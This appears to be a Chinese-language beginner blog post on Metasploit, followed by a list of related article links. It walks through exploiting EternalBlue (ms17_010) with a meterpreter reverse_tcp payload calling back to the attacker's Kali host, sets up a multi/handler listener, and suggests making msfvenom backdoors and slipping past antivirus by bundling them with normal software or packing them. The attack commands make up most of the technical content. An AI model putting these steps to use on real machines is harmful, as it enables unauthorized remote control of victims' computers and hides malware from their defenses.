【网络安全】-入门版

secure

  • 一、基本工具
    • [1、metasploit framework](#1、metasploit framework)

      ps.本着兴趣爱好,加强电脑的安全防护能力,并严格遵守法律和道德规范。

一、基本工具

1、metasploit framework

msf(metasploit framework)是一个开源的渗透测试框架 ,用于开发、测试和执行各种网络安全攻击。metasploit framework提供了大量的渗透测试工具漏洞利用模块负载模块,可以用于发现系统中的漏洞、测试系统的安全性,并进行攻击和漏洞利用。它支持多种操作系统,包括Windows、Linux和Mac OS X。

msf使用法则:使用模块->配置模块必选项->运行模块

bash 复制代码
msfconsole		//进入msf控制台,以使用模块(推荐root权限)
>>>进入msf

//1、使用模块
search 关键词	//搜索模块
use 模块编号/绝对路径	//使用模块
>>>进入模块
//2、配置模块必选项
show options	//显示配置选项
set 选项名称 值
//3、运行模块
run

举例:metasploit攻击永恒之蓝 (后门)

1、有此漏洞的目标主机

bash 复制代码
//1、使用模块
use exploit/windows/smb/ms17_010_eternalblue
//2、设置必选项
//查看必选项[*required为yes的就是必选项]
show options
set RH0TS 192.168.1.128	//[RHOSTS:为target host(s)代表你要攻击谁]
set payload windows/x64/meterpreter/reverse_tcp	//[payload,是攻击载荷,就是攻击完成后想干啥,这里是想获取meterpreter][meterpreter相当于内部策反的间谍,提供远程控制功能。]
set LHOST 192.168.1.136 //[LHOSTS为listen host代表你是谁,既Kali的IP地址]
set LPORT 12345	//[LPORT:为listen port,代表你要在kali上开启的端口,1-65535随便选,但不能被占用]
3、运行
run
4、进入目标主机
>>>meterpreter
help	//从帮助里看看能对目标主机干什么

2、无此漏洞的目标主机(常用)

没有漏洞就得拍个间谍过去,把后门打开。

2.1 目标主机的间谍软件:msfvenom是用来生成后门的软件,在目标机上执行后门 ,在本地监听上线,更容易策反meterpreter ,图中是windows,此外,还能直接修改为linux、OSX的后门软件。[*msfvenom在shell里使用,不是msfconsoles终端]

避开杀毒软件

方法一:和正常软件捆绑

方法二:给辅助软件加壳

自行寻找

2.2 本地主机的接应程序:

bash 复制代码
use exploit/multi/handler	//攻击多目标载荷模块
set payload windows/x64/meterpreter/reverse_tcp//设置载荷
set thost 192.168.1.136
set lport 9999
run
相关推荐
网安小白的进阶之路3 小时前
A模块 系统与网络安全 第四门课 弹性交换网络-2
网络·安全·web安全·系统安全·交换机
安全系统学习3 小时前
网络安全之RCE分析与利用详情
服务器·网络·安全·web安全·系统安全
武汉唯众智创3 小时前
网络安全实训室建设方案全攻略
网络·安全·web安全·网络安全·网络安全实训室·网络安全实验室
weixin_472339463 小时前
网络安全攻防:文件上传漏洞的深度解析与防御实践
安全·web安全
雪兽软件3 小时前
2025 年网络安全与人工智能发展趋势
人工智能·安全·web安全
小黄人20254 小时前
自动驾驶安全技术的演进与NVIDIA的创新实践
人工智能·安全·自动驾驶
CS创新实验室4 小时前
筑牢 AIGC 安全防线:警惕提示词注入攻击
安全·大模型·aigc·提示词·提示词注入
宝山哥哥5 小时前
网络信息安全学习笔记1----------网络信息安全概述
网络·笔记·学习·安全·网络安全
电池保护板测试仪厂家7 小时前
电池充放电容量检测:守护电动出行设备动力核心的安全防线
科技·安全·能源·制造·零售·交通物流
深盾科技9 小时前
.NET 安全之 JIT 保护技术深度解析
安全·.net